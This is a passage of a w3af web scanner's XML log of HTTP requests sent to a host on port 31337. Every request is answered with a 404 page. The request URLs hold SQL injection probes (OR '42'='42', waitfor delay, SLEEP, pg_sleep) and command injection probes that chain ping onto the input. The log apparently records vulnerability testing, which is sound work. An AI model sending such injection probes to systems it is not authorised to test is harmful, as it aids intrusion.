                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="828">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="831">
                <http-request>
                    <status>POST http://10.12.68.43:31337/42%27+OR+%2742%27%3D%2742 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="841">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="844">
                <http-request>
                    <status>POST http://10.12.68.43:31337/42%27+AND+%2742%27%3D%2743 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="849">
                <http-request>
                    <status>POST http://10.12.68.43:31337/WSG8DZJL HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="852">
                <http-request>
                    <status>POST http://10.12.68.43:31337/gdscu%3C%2F-%3Egdscu%2F%2Agdscu%22gdscugdscu%27gdscugdscu%60gdscugdscu+%3D HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="856">
                <http-request>
                    <status>POST http://10.12.68.43:31337/42+OR+42%3D42+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="864">
                <http-request>
                    <status>POST http://10.12.68.43:31337/42+AND+42%3D43+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="869">
                <http-request>
                    <status>POST http://10.12.68.43:31337/P68NYwHE HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="873">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="875">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="900">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="901">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="926">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="928">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="941">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="944">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="957">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="960">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="972">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
